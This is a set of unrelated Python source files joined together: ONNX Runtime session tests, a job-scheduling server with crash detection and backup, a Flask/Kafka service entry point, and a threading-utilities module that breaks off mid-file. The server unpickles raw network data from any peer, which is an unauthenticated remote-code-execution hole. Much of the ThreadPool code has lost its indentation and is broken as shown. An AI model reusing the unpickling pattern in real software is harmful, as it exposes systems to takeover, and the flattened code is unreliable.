    ort_memory_info = onnxrt.OrtMemoryInfo("Cpu", onnxrt.OrtAllocatorType.ORT_ARENA_ALLOCATOR, 0, onnxrt.OrtMemType.DEFAULT)
    # Use this option if using non-default OrtArenaCfg : onnxrt.create_and_register_allocator(ort_memory_info, ort_arena_cfg)
    onnxrt.create_and_register_allocator(ort_memory_info, None)
    # Create a session that will use the registered arena based allocator
    so1 = onnxrt.SessionOptions()
    so1.log_severity_level = 1
    so1.add_session_config_entry("session.use_env_allocators", "1")
    onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so1)
    # Create a session that will NOT use the registered arena based allocator
    so2 = onnxrt.SessionOptions()
    so2.log_severity_level = 1
    onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so2)
def testCheckAndNormalizeProviderArgs(self):
    """Exercise the provider / provider_options normalization helper."""
    from onnxruntime.capi.onnxruntime_inference_collection import check_and_normalize_provider_args
    valid_providers = ["a", "b", "c"]

    def check_success(providers, provider_options, expected_providers, expected_provider_options):
        actual_providers, actual_provider_options = check_and_normalize_provider_args(
            providers, provider_options, valid_providers)
        self.assertEqual(expected_providers, actual_providers)
        self.assertEqual(expected_provider_options, actual_provider_options)

    def check_failure(providers, provider_options):
        with self.assertRaises(ValueError):
            check_and_normalize_provider_args(providers, provider_options, valid_providers)

    check_success(None, None, [], [])
    check_success(["a"], None, ["a"], [{}])
    check_success(["a", "b"], None, ["a", "b"], [{}, {}])
    check_success([("a", {1: 2}), "b"], None, ["a", "b"], [{"1": "2"}, {}])
    check_success(["a", "b"], [{1: 2}, {}], ["a", "b"], [{"1": "2"}, {}])
    # Duplicate providers collapse to the first occurrence, with a warning.
    with self.assertWarns(UserWarning):
        check_success(["a", "b", "a"], [{"x": 1}, {}, {"y": 2}], ["a", "b"], [{"x": "1"}, {}])
    # disable this test
    # provider not valid
    # check_failure(["d"], None)
    check_failure(3, None)                    # providers not a sequence
    check_failure([3], None)                  # providers value invalid
    check_failure(["a"], 3)                   # provider_options not a sequence
    check_failure(["a"], ["not dict"])        # provider_options value invalid
    check_failure(["a", "b"], [{1: 2}])       # providers/provider_options length mismatch
    check_failure([("a", {1: 2})], [{3: 4}])  # mixed options specification unsupported
def testRegisterCustomEPsLibrary(self):
    """Load a custom execution provider from a shared library (Windows only)."""
    # Excluded on macOS and Linux.
    if not sys.platform.startswith("win"):
        return
    shared_library = 'test_execution_provider.dll'
    if not os.path.exists(shared_library):
        raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
    this = os.path.dirname(__file__)
    custom_op_model = os.path.join(this, "testdata", "custom_execution_provider_library", "test_model.onnx")
    if not os.path.exists(custom_op_model):
        raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
    from onnxruntime.capi import _pybind_state as C
    session_options = C.get_default_session_options()
    sess = C.InferenceSession(session_options, custom_op_model, True, True)
    provider_options = [{'shared_lib_path': shared_library,
                         'device_id': '1', 'some_config': 'val'}]
    sess.initialize_session(['my_ep'], provider_options, set())
    print("Create session with customize execution provider successfully!")
if __name__ == '__main__':
    # Run the whole test module under unittest's CLI runner.
    unittest.main()
|
__main__.py | """Script to set up and run central server.
Responsible for communication with computing nodes, primary backup, job
scheduling, load balancing, job-node matchmaking decisions etc.
Messages received from the node:
- JOB_SUBMIT: The node sends the job to be submitted for execution
in this message along with the executable file. The server tries to
schedule the job if possible, else adds it to the job queue.
- HEARTBEAT: The server(main) receives the cpu-time and memory of the
node through this heartbeat and also detects that the node is alive.
It responds with a heartbeat message of its own through a child
process.
- EXECUTED_JOB: This message tells the server that the job given to the
node has either been completed or preempted(with the help of a
completed flag). If the job has been completed, the server removes
it from the job_queue and informs the node which has submitted the
job. Also, it tries to schedule the jobs in the job queue. On the
other hand, if the job is a preempted one, the server tries to
schedule it again.
- ACK_SUBMITTED_JOB_COMPLETION: The server ignores this.
- ACK_JOB_EXEC: The server ignores this.
- ACK_JOB_EXEC_PREEMPT: The server ignores this.
Messages received from backup:
- HEARTBEAT: Just tells the server that the backup is alive. The server
responds with its own heartbeat message in response to this.
Messages received from its own child process:
- NODE_CRASH: The server main process receives this from a child process
after a node or a set of nodes has crashed. The server tries to schedule
jobs running on those nodes somewhere else.
Messages sent to node:
- HEARTBEAT: Server sends this message in response to HEARTBEAT message
by node. A delay has been set in the server's response, so that
heartbeat messages do not congest the network.
- ACK_JOB_SUBMIT: Server sends this message on receiving a JOB_SUBMIT
message from the node. Includes job's submission id in
message's content field.
- ACK_EXECUTED_JOB: Sent in response to EXECUTED_JOB message.
- JOB_EXEC: Sent by server requesting execution of a job on the node.
Has job object in content, and executable in file field.
- JOB_PREEMPT_EXEC: Sent by server requesting preemption of an executing
job, and execution of a new job. Has (new_job,
job_to_preempt receipt id) in content, and executable file of new
job in file.
- SUBMITTED_JOB_COMPLETION: Server, on receiving EXECUTED_JOB message
from a node, checks job's 'completed' attribute, and if True,
sends SUBMITTED_JOB_COMPLETION to submitting node.
Messages sent to backup:
- BACKUP_UPDATE: Sent whenever server state data structures are updated.
Contains latest ServerState.
- HEARTBEAT: This is sent in response to the heartbeat of the backup.
This is used by the backup to detect server crash and take over.
"""
import argparse
import multiprocessing as mp
import os
import os.path
import pickle
import select
import socket
import time
from . import message_handlers
from ..messaging import message
from ..messaging import messageutils
from ..utils import priorityqueue
SERVER_SEND_PORT = 5005
SERVER_RECV_PORT = 5006
BUFFER_SIZE = 1048576
CRASH_ASSUMPTION_TIME = 20 # seconds
CRASH_DETECTOR_SLEEP_TIME = 5 # seconds
SERVER_START_WAIT_TIME = 5 # seconds
BACKUP_SERVER_STATE_PATH = './backup_state.pkl'
PROMPT_WELCOME_FILENAME = '/prompt_welcome'
def print_welcome_message():
    """Print a welcome message read from the prompt_welcome file to stdout."""
    # PROMPT_WELCOME_FILENAME starts with '/', so plain concatenation (not
    # os.path.join, which would discard the directory) builds the full path.
    module_dir = os.path.dirname(os.path.realpath(__file__))
    prompt_welcome_filepath = module_dir + PROMPT_WELCOME_FILENAME
    with open(prompt_welcome_filepath, 'r') as file:
        print(file.read())
def detect_node_crash(node_last_seen, server_ip):
    """Detect computing-node crashes from stale heartbeats.

    Runs as a child process, periodically checking the last heartbeat time
    recorded for each computing node.

    :param node_last_seen: Dictionary with time when last heartbeat was
        received from node {node_id: last_seen_time}
    :param server_ip: String with IP address of server (this node).
    """
    while True:
        time.sleep(CRASH_DETECTOR_SLEEP_TIME)
        print('CHECKING CRASH')
        now = time.time()
        # A node is presumed dead once its heartbeat is older than the
        # crash-assumption threshold.
        crashed_nodes = {
            node_id
            for node_id, last_seen_time in node_last_seen.items()
            if now - last_seen_time > CRASH_ASSUMPTION_TIME
        }
        # Report crashes to the main process, which listens for incoming
        # messages on SERVER_RECV_PORT.
        if crashed_nodes:
            print('NODE CRASHED')
            print(crashed_nodes)
            messageutils.make_and_send_message(msg_type='NODE_CRASH',
                                               content=crashed_nodes,
                                               file_path=None,
                                               to=server_ip,
                                               msg_socket=None,
                                               port=SERVER_RECV_PORT)
def main():
    """Get server ip, backup ip, listen for messages and manage jobs.

    Restores state from a backup snapshot if one exists, spawns the
    crash-detector child process, then runs a select() loop dispatching
    incoming pickled Message objects to the appropriate handlers.
    """
    parser = argparse.ArgumentParser(description='Set up central server.')
    parser.add_argument(
        '--server-ip',
        required=True,
        help='IP address of central server (this node).')
    parser.add_argument(
        '--backup-ip',
        required=True,
        help='IP address of primary backup server.')
    args = parser.parse_args()
    backup_ip = args.backup_ip
    server_ip = args.server_ip
    print_welcome_message()
    # Server-state bookkeeping structures.
    compute_nodes = {}  # {node_id: status}
    job_queue = priorityqueue.JobQueue()
    running_jobs = {}  # {node_id: [list of jobs]}
    job_executable = {}  # {job_id: executable}
    job_sender = {}  # {job_id: sender}
    # In case of backup server taking over on original central server crash
    # gives backup process enough time to terminate
    time.sleep(SERVER_START_WAIT_TIME)
    job_receipt_id = 0  # Unique ID assigned to each job from server.
    server_state_order = 0  # Sequence ordering of ServerState sent to backup.
    # Manager dict is shared with the crash-detector child process.
    manager = mp.Manager()
    node_last_seen = manager.dict()  # {node_id: last_seen_time}
    # Initialize current server state from backup snapshot
    # Used in case primary backup is taking over as central server
    if os.path.isfile(BACKUP_SERVER_STATE_PATH):
        with open(BACKUP_SERVER_STATE_PATH, 'rb') as backup_server_state:
            server_state = pickle.load(backup_server_state)
            compute_nodes = server_state.compute_nodes
            # Restart the heartbeat clock for every known node.
            for node_id, _ in compute_nodes.items():
                node_last_seen[node_id] = time.time()
            running_jobs = server_state.running_jobs
            job_receipt_id = server_state.job_receipt_id
            job_sender = server_state.job_sender
            job_executable = server_state.job_executable
            job_queue = priorityqueue.JobQueue()
            for job in server_state.job_queue:
                job_queue.put(job)
    process_crash_detector = mp.Process(
        target=detect_node_crash, args=(node_last_seen, server_ip,))
    process_crash_detector.start()
    # Creates a TCP/IP socket
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Binds the socket to the port
    server_address = ('', SERVER_RECV_PORT)
    print('Starting up on %s port %s' % server_address)
    server.bind(server_address)
    server.listen(5)
    # Sockets for reading and writing
    inputs = [server]
    outputs = []
    while inputs:
        # Wait for at least one of the sockets to be ready for processing
        readable, _, _ = select.select(inputs, outputs, inputs)
        # Handle inputs
        for msg_socket in readable:
            if msg_socket is server:
                # A "readable" server socket is ready to accept a connection
                connection, client_address = msg_socket.accept()
                inputs.append(connection)
            else:
                data = msg_socket.recv(BUFFER_SIZE)
                if data:
                    # Drain the socket until the peer stops sending, then
                    # reassemble and unpickle the complete message.
                    data_list = []
                    while data:
                        data_list.append(data)
                        data = msg_socket.recv(BUFFER_SIZE)
                    data = b''.join(data_list)
                    msg = pickle.loads(data)
                    assert isinstance(msg, message.Message), \
                        "Received object on socket not of type Message."
                    print(msg)
                    # Dispatch on message type; see module docstring for the
                    # meaning of each message.
                    if msg.msg_type == 'HEARTBEAT':
                        if msg.sender == backup_ip:
                            message_handlers.heartbeat_from_backup_handler(
                                received_msg=msg)
                        else:
                            message_handlers.heartbeat_handler(
                                compute_nodes=compute_nodes,
                                node_last_seen=node_last_seen,
                                running_jobs=running_jobs,
                                job_queue=job_queue,
                                job_sender=job_sender,
                                job_executable=job_executable,
                                job_receipt_id=job_receipt_id,
                                backup_ip=backup_ip,
                                server_state_order=server_state_order,
                                received_msg=msg)
                    elif msg.msg_type == 'JOB_SUBMIT':
                        job_receipt_id += 1
                        server_state_order += 1
                        message_handlers.job_submit_handler(
                            job_queue=job_queue,
                            compute_nodes=compute_nodes,
                            running_jobs=running_jobs,
                            job_sender=job_sender,
                            job_executable=job_executable,
                            received_msg=msg,
                            job_receipt_id=job_receipt_id,
                            backup_ip=backup_ip,
                            server_state_order=server_state_order)
                    elif msg.msg_type == 'EXECUTED_JOB':
                        server_state_order += 1
                        print(
                            'RECV: ' + str(msg.content) + ' ' +
                            str(msg.content.completed))
                        # Handler returns the (possibly rebuilt) job queue.
                        job_queue = message_handlers.executed_job_handler(
                            job_queue=job_queue,
                            compute_nodes=compute_nodes,
                            job_receipt_id=job_receipt_id,
                            running_jobs=running_jobs,
                            job_sender=job_sender,
                            job_executable=job_executable,
                            backup_ip=backup_ip,
                            server_state_order=server_state_order,
                            received_msg=msg)
                    elif msg.msg_type == 'ACK_JOB_EXEC':
                        message_handlers.ack_ignore_handler()
                    elif msg.msg_type == 'ACK_JOB_EXEC_PREEMPT':
                        message_handlers.ack_ignore_handler()
                    elif msg.msg_type == 'ACK_SUBMITTED_JOB_COMPLETION':
                        message_handlers.ack_ignore_handler()
                    elif msg.msg_type == 'NODE_CRASH':
                        message_handlers.node_crash_handler(
                            received_msg=msg,
                            compute_nodes=compute_nodes,
                            running_jobs=running_jobs,
                            job_queue=job_queue,
                            node_last_seen=node_last_seen,
                            job_executable=job_executable)
                else:
                    # Empty read: peer closed the connection.
                    inputs.remove(msg_socket)
                    msg_socket.close()


if __name__ == '__main__':
    main()
|
app.py | from src.kafka_module.kf_service import process_layout_detector_kf, layout_detector_request_worker
from anuvaad_auditor.loghandler import log_info
from anuvaad_auditor.loghandler import log_error
from flask import Flask
from flask.blueprints import Blueprint
from flask_cors import CORS
from src import routes
import config
import torch
import threading
import time
from src.utilities.app_context import LOG_WITHOUT_CONTEXT
# Flask application serving the layout-detector API.
merge_app = Flask(__name__)
def start_kafka():
    """Start the Kafka consumer and request-worker threads for the layout detector.

    Any startup failure is logged rather than propagated.
    """
    try:
        consumer_thread = threading.Thread(
            target=process_layout_detector_kf, name='layout-detector-consumer-thread')
        consumer_thread.start()
        log_info("multithread Kafka running on multithread", LOG_WITHOUT_CONTEXT)
        worker_thread = threading.Thread(
            target=layout_detector_request_worker, name='layout_detector-worker-thread')
        worker_thread.start()
        log_info("Starting layout_detector_request_worker", LOG_WITHOUT_CONTEXT)
    except Exception as e:
        log_error("threading ERROR WHILE RUNNING CUSTOM THREADS ", LOG_WITHOUT_CONTEXT, e)
# Enable CORS for API routes when configured.
if config.ENABLE_CORS:
    cors = CORS(merge_app, resources={r"/api/*": {"origins": "*"}})
# Register every Blueprint exposed by the routes module under the API prefix.
for blueprint in vars(routes).values():
    if isinstance(blueprint, Blueprint):
        merge_app.register_blueprint(blueprint, url_prefix=config.API_URL_PREFIX)
if __name__ == "__main__":
    # Start Kafka consumer/worker threads, then serve the Flask app.
    start_kafka()
    print(merge_app.url_map)
    merge_app.run(host=config.HOST, port=config.PORT, debug=config.DEBUG)
|
threading_utils.py | # Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Classes and functions related to threading."""
import functools
import inspect
import logging
import os
import sys
import threading
import time
import traceback
from utils import tools
tools.force_local_third_party()
# third_party/
import six
from six.moves import queue as Queue
# Priorities for tasks in AutoRetryThreadPool, particular values are important.
PRIORITY_HIGH = 1 << 8
PRIORITY_MED = 2 << 8
PRIORITY_LOW = 3 << 8
class LockWithAssert(object):
  """Non-recursive lock wrapper that remembers which thread currently holds it.

  Use as a context manager; assert_locked() lets callers verify ownership.
  """

  def __init__(self):
    self._lock = threading.Lock()
    # Thread currently holding the lock, or None when released.
    self._owner = None

  def __enter__(self):
    self._lock.acquire()
    # A non-None owner here would mean re-entry, which this lock forbids.
    assert self._owner is None
    self._owner = threading.current_thread()

  def __exit__(self, _exc_type, _exec_value, _traceback):
    self.assert_locked('Releasing unowned lock')
    # Clear ownership before actually releasing the underlying lock.
    self._owner = None
    self._lock.release()
    # Never swallow exceptions raised inside the 'with' body.
    return False

  def assert_locked(self, msg=None):
    """Asserts the lock is owned by running thread."""
    assert self._owner == threading.current_thread(), msg
class ThreadPoolError(Exception):
  """Base class for exceptions raised by ThreadPool."""
  # Concrete subclasses: ThreadPoolEmpty, ThreadPoolClosed.
  pass
class ThreadPoolEmpty(ThreadPoolError):
  """Trying to get task result from a thread pool with no pending tasks."""
  # Raised by ThreadPool.get_one_result().
  pass
class ThreadPoolClosed(ThreadPoolError):
  """Trying to do something with a closed thread pool."""
  # Raised by ThreadPool.add_task() and ThreadPool.close().
  pass
class ThreadPool(object):
"""Multithreaded worker pool with priority support.
When the priority of tasks match, it works in strict FIFO mode.
"""
QUEUE_CLASS = Queue.PriorityQueue
def __init__(self, initial_threads, max_threads, queue_size, prefix=None):
"""Immediately starts |initial_threads| threads.
Arguments:
initial_threads: Number of threads to start immediately. Can be 0 if it is
uncertain that threads will be needed.
max_threads: Maximum number of threads that will be started when all the
threads are busy working. Often the number of CPU cores.
queue_size: Maximum number of tasks to buffer in the queue. 0 for
unlimited queue. A non-zero value may make add_task()
blocking.
prefix: Prefix to use for thread names. Pool's threads will be
named '<prefix>-<thread index>'.
"""
prefix = prefix or 'tp-0x%0x' % id(self)
logging.debug(
'New ThreadPool(%d, %d, %d): %s', initial_threads, max_threads,
queue_size, prefix)
assert initial_threads <= max_threads
assert max_threads <= 1024
self.tasks = self.QUEUE_CLASS(queue_size)
self._max_threads = max_threads
self._prefix = prefix
# Used to assign indexes to tasks.
self._num_of_added_tasks_lock = threading.Lock()
self._num_of_added_tasks = 0
# Lock that protected everything below (including conditional variable).
self._lock = threading.Lock()
# Condition 'bool(_outputs) or bool(_exceptions) or _pending_count == 0'.
self._outputs_exceptions_cond = threading.Condition(self._lock)
self._outputs = []
self._exceptions = []
# Number of pending tasks (queued or being processed now).
self._pending_count = 0
# List of threads.
self._workers = []
# Number of threads that are waiting for new tasks.
self._ready = 0
# Number of threads already added to _workers, but not yet running the loop.
self._starting = 0
# True if close was called. Forbids adding new tasks.
self._is_closed = False
for _ in range(initial_threads):
self._add_worker()
def _add_worker(self):
"""Adds one worker thread if there isn't too many. Thread-safe."""
with self._lock:
if len(self._workers) >= self._max_threads or self._is_closed:
return False
worker = threading.Thread(
name='%s-%d' % (self._prefix, len(self._workers)), target=self._run)
self._workers.append(worker)
self._starting += 1
logging.debug('Starting worker thread %s', worker.name)
worker.daemon = True
worker.start()
return True
def add_task(self, priority, func, *args, **kwargs):
"""Adds a task, a function to be executed by a worker.
Arguments:
- priority: priority of the task versus others. Lower priority takes
precedence.
- func: function to run. Can either return a return value to be added to the
output list or be a generator which can emit multiple values.
- args and kwargs: arguments to |func|. Note that if func mutates |args| or
|kwargs| and that the task is retried, see
AutoRetryThreadPool, the retry will use the mutated
values.
Returns:
Index of the item added, e.g. the total number of enqueued items up to
now.
"""
assert isinstance(priority, int)
assert callable(func)
with self._lock:
if self._is_closed:
raise ThreadPoolClosed('Can not add a task to a closed ThreadPool')
start_new_worker = (
# Pending task count plus new task > number of available workers.
self.tasks.qsize() + 1 > self._ready + self._starting and
# Enough slots.
len(self._workers) < self._max_threads
)
self._pending_count += 1
with self._num_of_added_tasks_lock:
self._num_of_added_tasks += 1
index = self._num_of_added_tasks
self.tasks.put((priority, index, func, args, kwargs))
if start_new_worker:
self._add_worker()
return index
def _run(self):
"""Worker thread loop. Runs until a None task is queued."""
# Thread has started, adjust counters.
with self._lock:
self._starting -= 1
self._ready += 1
while True:
try:
task = self.tasks.get()
finally:
with self._lock:
self._ready -= 1
try:
if task is None:
# We're done.
return
_priority, _index, func, args, kwargs = task
if inspect.isgeneratorfunction(func):
for out in func(*args, **kwargs):
self._output_append(out)
else:
out = func(*args, **kwargs)
self._output_append(out)
except Exception as e:
logging.warning('Caught exception: %s', e)
exc_info = sys.exc_info()
logging.info(''.join(traceback.format_tb(exc_info[2])))
with self._outputs_exceptions_cond:
self._exceptions.append(exc_info)
self._outputs_exceptions_cond.notifyAll()
finally:
try:
# Mark thread as ready again, mark task as processed. Do it before
# waking up threads waiting on self.tasks.join(). Otherwise they might
# find ThreadPool still 'busy' and perform unnecessary wait on CV.
with self._outputs_exceptions_cond:
self._ready += 1
self._pending_count -= 1
if self._pending_count == 0:
self._outputs_exceptions_cond.notifyAll()
self.tasks.task_done()
except Exception as e:
# We need to catch and log this error here because this is the root
# function for the thread, nothing higher will catch the error.
logging.exception('Caught exception while marking task as done: %s',
e)
def _output_append(self, out):
if out is not None:
with self._outputs_exceptions_cond:
self._outputs.append(out)
self._outputs_exceptions_cond.notifyAll()
def join(self):
"""Extracts all the results from each threads unordered.
Call repeatedly to extract all the exceptions if desired.
Note: will wait for all work items to be done before returning an exception.
To get an exception early, use get_one_result().
"""
# TODO(maruel): Stop waiting as soon as an exception is caught.
self.tasks.join()
with self._outputs_exceptions_cond:
if self._exceptions:
e = self._exceptions.pop(0)
six.reraise(e[0], e[1], e[2])
out = self._outputs
self._outputs = []
return out
def get_one_result(self):
"""Returns the next item that was generated or raises an exception if one
occurred.
Raises:
ThreadPoolEmpty - no results available.
"""
# Get first available result.
for result in self.iter_results():
return result
# No results -> tasks queue is empty.
raise ThreadPoolEmpty('Task queue is empty')
def iter_results(self):
"""Yields results as they appear until all tasks are processed."""
while True:
# Check for pending results.
result = None
self._on_iter_results_step()
with self._outputs_exceptions_cond:
if self._exceptions:
e = self._exceptions.pop(0)
six.reraise(e[0], e[1], e[2])
if self._outputs:
# Remember the result to yield it outside of the lock.
result = self._outputs.pop(0)
else:
# No pending tasks -> all tasks are done.
if not self._pending_count:
return
# Some task is queued, wait for its result to appear.
# Use non-None timeout so that process reacts to Ctrl+C and other
# signals, see http://bugs.python.org/issue8844.
self._outputs_exceptions_cond.wait(timeout=0.1)
continue
yield result
def close(self):
    """Shuts down every worker thread and marks the pool closed.

    Raises:
      ThreadPoolClosed if the pool was already closed.
    """
    # Ensure no new threads can be started; after this point self._workers
    # is effectively constant and safe to read outside the lock.
    with self._lock:
        if self._is_closed:
            raise ThreadPoolClosed('Can not close already closed ThreadPool')
        self._is_closed = True
        # One None sentinel per worker tells each thread to exit.
        for _ in self._workers:
            self.tasks.put(None)
    for worker in self._workers:
        # 'join' without timeout blocks signal handlers, spin with timeout.
        while worker.is_alive():
            worker.join(30)
    logging.debug(
        'Thread pool \'%s\' closed: spawned %d threads total',
        self._prefix, len(self._workers))
def abort(self):
    """Drains the task queue without executing the queued work.

    To be used when the pool should stop early, like when Ctrl-C was detected.

    Returns:
      Number of tasks cancelled.
    """
    cancelled = 0
    while True:
        try:
            self.tasks.get_nowait()
        except Queue.Empty:
            return cancelled
        self.tasks.task_done()
        cancelled += 1
def _on_iter_results_step(self):
    # Hook invoked on every iter_results() loop iteration; subclasses
    # (e.g. ThreadPoolWithProgress) override it to refresh progress output.
    pass
def __enter__(self):
    """Enables 'with' statement; the pool itself is the context value."""
    return self
def __exit__(self, _exc_type, _exc_value, _traceback):
    """Enables 'with' statement; closes the pool on scope exit."""
    self.close()
class AutoRetryThreadPool(ThreadPool):
    """Automatically retries enqueued operations on exception.

    The retry count is packed into the low INTERNAL_PRIORITY_BITS bits of the
    priority value; each retry re-enqueues at priority+1 (numerically higher,
    i.e. lower scheduling priority). That is why callers must leave those low
    bits zero.
    """
    # See also PRIORITY_* module-level constants.
    # Low 8 bits of the priority are reserved to count retries.
    INTERNAL_PRIORITY_BITS = (1<<8) - 1

    def __init__(self, exceptions, retries, *args, **kwargs):
        """
        Arguments:
          exceptions: list of exception classes that can be retried on.
          retries: maximum number of retries to do.
        """
        assert exceptions and all(issubclass(e, Exception) for e in exceptions), (
            exceptions)
        # retries must fit into the reserved low priority bits.
        assert 1 <= retries <= self.INTERNAL_PRIORITY_BITS
        super(AutoRetryThreadPool, self).__init__(*args, **kwargs)
        self._swallowed_exceptions = tuple(exceptions)
        self._retries = retries

    def add_task(self, priority, func, *args, **kwargs):
        """Tasks added must not use the lower priority bits since they are reserved
        for retries.
        """
        assert (priority & self.INTERNAL_PRIORITY_BITS) == 0
        # Wrap the callable in _task_executer so failures can be re-enqueued.
        return super(AutoRetryThreadPool, self).add_task(
            priority,
            self._task_executer,
            priority,
            None,
            func,
            *args,
            **kwargs)

    def add_task_with_channel(self, channel, priority, func, *args, **kwargs):
        """Tasks added must not use the lower priority bits since they are reserved
        for retries.
        """
        assert (priority & self.INTERNAL_PRIORITY_BITS) == 0
        return super(AutoRetryThreadPool, self).add_task(
            priority,
            self._task_executer,
            priority,
            channel,
            func,
            *args,
            **kwargs)

    def _task_executer(self, priority, channel, func, *args, **kwargs):
        """Wraps the function and automatically retry on exceptions."""
        try:
            result = func(*args, **kwargs)
            if channel is None:
                return result
            channel.send_result(result)
        # pylint: disable=catching-non-exception
        except self._swallowed_exceptions as e:
            # Retry a few times, lowering the priority.
            # The low bits of |priority| hold the retry count, so += 1 both
            # counts the retry and slightly demotes the rescheduled task.
            actual_retries = priority & self.INTERNAL_PRIORITY_BITS
            if actual_retries < self._retries:
                priority += 1
                logging.debug(
                    'Swallowed exception \'%s\'. Retrying at lower priority %X',
                    e, priority)
                super(AutoRetryThreadPool, self).add_task(
                    priority,
                    self._task_executer,
                    priority,
                    channel,
                    func,
                    *args,
                    **kwargs)
                return
            # Out of retries: propagate, or forward to the result channel.
            if channel is None:
                raise
            channel.send_exception()
        except Exception:
            # Non-retryable exception: propagate, or forward to the channel.
            if channel is None:
                raise
            channel.send_exception()
class IOAutoRetryThreadPool(AutoRetryThreadPool):
    """Thread pool that automatically retries on IOError.

    Supposed to be used for IO bound tasks, and thus default maximum number of
    worker threads is independent of number of CPU cores.
    """
    # Initial and maximum number of worker threads.
    INITIAL_WORKERS = 2
    # 64-bit processes get a higher thread ceiling than 32-bit ones.
    MAX_WORKERS = 16 if sys.maxsize > 2**32 else 8
    # Maximum number of retries per task on IOError.
    RETRIES = 5

    def __init__(self):
        # Positional args map to AutoRetryThreadPool/ThreadPool constructor
        # parameters; 'io' is the thread-name prefix.
        super(IOAutoRetryThreadPool, self).__init__(
            [IOError],
            self.RETRIES,
            self.INITIAL_WORKERS,
            self.MAX_WORKERS,
            0,
            'io')
class Progress(object):
    """Prints progress and accepts updates thread-safely.

    Worker threads queue updates via update_item(); only the primary thread
    calls print_update() to drain the queue and render.
    """

    def __init__(self, columns):
        """Creates a Progress bar that will updates asynchronously from the worker
        threads.

        Arguments:
          columns: list of tuple(name, initialvalue), defines both the number of
                   columns and their initial values.
        """
        assert all(
            len(c) == 2 and isinstance(c[0], str) and isinstance(c[1], int)
            for c in columns), columns
        # Members to be used exclusively in the primary thread.
        self.use_cr_only = True
        self.unfinished_commands = set()
        self.start = time.time()
        self._last_printed_line = ''
        self._columns = [c[1] for c in columns]
        self._columns_lookup = dict((c[0], i) for i, c in enumerate(columns))
        # Setting it to True forces a print on the first print_update() call.
        self._value_changed = True
        # To be used in all threads.
        self._queued_updates = Queue.Queue()

    def update_item(self, name, raw=False, **kwargs):
        """Queue information to print out.

        Arguments:
          name: string to print out to describe something that was completed.
          raw: if True, prints the data without the header.
          <kwargs>: argument name is a name of a column. it's value is the increment
                    to the column, value is usually 0 or 1.
        """
        assert isinstance(name, basestring), repr(name)
        assert isinstance(raw, bool), repr(raw)
        assert all(isinstance(v, int) for v in kwargs.values()), repr(kwargs)
        args = [(self._columns_lookup[k], v) for k, v in kwargs.items() if v]
        self._queued_updates.put((name, raw, args))

    def print_update(self):
        """Prints the current status."""
        # Flush all the logging output so it doesn't appear within this output.
        for handler in logging.root.handlers:
            handler.flush()
        got_one = False
        while True:
            try:
                name, raw, args = self._queued_updates.get_nowait()
            except Queue.Empty:
                break
            for k, v in args:
                self._columns[k] += v
            # NOTE(review): this overwrites any True set by an earlier queued
            # update in the same drain; confirm whether |= was intended.
            self._value_changed = bool(args)
            if not name:
                # Even if raw=True, there's nothing to print.
                continue
            got_one = True
            if raw:
                # Prints the data as-is.
                self._last_printed_line = ''
                sys.stdout.write('\n%s\n' % name.strip('\n'))
            else:
                line, self._last_printed_line = self._gen_line(name)
                sys.stdout.write(line)
        if not got_one and self._value_changed:
            # Make sure a line is printed in that case where statistics changes.
            line, self._last_printed_line = self._gen_line('')
            sys.stdout.write(line)
            got_one = True
            self._value_changed = False
        if got_one:
            # Ensure that all the output is flushed to prevent it from getting mixed
            # with other output streams (like the logging streams).
            sys.stdout.flush()
        if self.unfinished_commands:
            logging.debug('Waiting for the following commands to finish:\n%s',
                          '\n'.join(self.unfinished_commands))

    def _gen_line(self, name):
        """Generates the line to be printed; returns (rendered, bare) lines."""
        next_line = ('[%s] %6.2fs %s') % (
            self._render_columns(), time.time() - self.start, name)
        # Fill it with whitespace only if self.use_cr_only is set.
        prefix = ''
        if self.use_cr_only and self._last_printed_line:
            prefix = '\r'
        if self.use_cr_only:
            suffix = ' ' * max(0, len(self._last_printed_line) - len(next_line))
        else:
            suffix = '\n'
        return '%s%s%s' % (prefix, next_line, suffix), next_line

    def _render_columns(self):
        """Renders the columns right-aligned, joined with '/'."""
        # Use a list, not map(): a map iterator would be exhausted by the
        # max() call below on Python 3, leaving join() with nothing.
        columns_as_str = [str(c) for c in self._columns]
        max_len = max(len(c) for c in columns_as_str)
        return '/'.join(i.rjust(max_len) for i in columns_as_str)
class QueueWithProgress(Queue.PriorityQueue):
    """Implements progress support in join()."""

    def __init__(self, progress, *args, **kwargs):
        Queue.PriorityQueue.__init__(self, *args, **kwargs)
        # Progress instance polled from join().
        self.progress = progress

    def task_done(self):
        """Contrary to Queue.task_done(), it wakes self.all_tasks_done at each task
        done.
        """
        with self.all_tasks_done:
            try:
                unfinished = self.unfinished_tasks - 1
                if unfinished < 0:
                    raise ValueError('task_done() called too many times')
                self.unfinished_tasks = unfinished
                # This is less efficient, because we want the Progress to be updated.
                self.all_tasks_done.notify_all()
            except Exception as e:
                # Log instead of propagating: this runs on worker threads.
                logging.exception('task_done threw an exception.\n%s', e)

    def wake_up(self):
        """Wakes up all_tasks_done.

        Unlike task_done(), do not substract one from self.unfinished_tasks.
        """
        # TODO(maruel): This is highly inefficient, since the listener is awaken
        # twice; once per output, once per task. There should be no relationship
        # between the number of output and the number of input task.
        with self.all_tasks_done:
            self.all_tasks_done.notify_all()

    def join(self):
        """Calls print_update() whenever possible."""
        self.progress.print_update()
        with self.all_tasks_done:
            while self.unfinished_tasks:
                self.progress.print_update()
                # Use a short wait timeout so updates are printed in a timely manner.
                # TODO(maruel): Find a way so Progress.queue and self.all_tasks_done
                # share the same underlying event so no polling is necessary.
                self.all_tasks_done.wait(0.1)
            self.progress.print_update()
class ThreadPoolWithProgress(ThreadPool):
    """ThreadPool whose task queue drives a Progress display."""
    QUEUE_CLASS = QueueWithProgress

    def __init__(self, progress, *args, **kwargs):
        # Bind the progress object into the queue factory so the base class
        # constructs a QueueWithProgress.
        self.QUEUE_CLASS = functools.partial(self.QUEUE_CLASS, progress)
        super(ThreadPoolWithProgress, self).__init__(*args, **kwargs)

    def _output_append(self, out):
        """Also wakes up the listener on new completed test_case."""
        super(ThreadPoolWithProgress, self)._output_append(out)
        self.tasks.wake_up()

    def _on_iter_results_step(self):
        # Keep the progress display fresh while the caller iterates results.
        self.tasks.progress.print_update()
class DeadlockDetector(object):
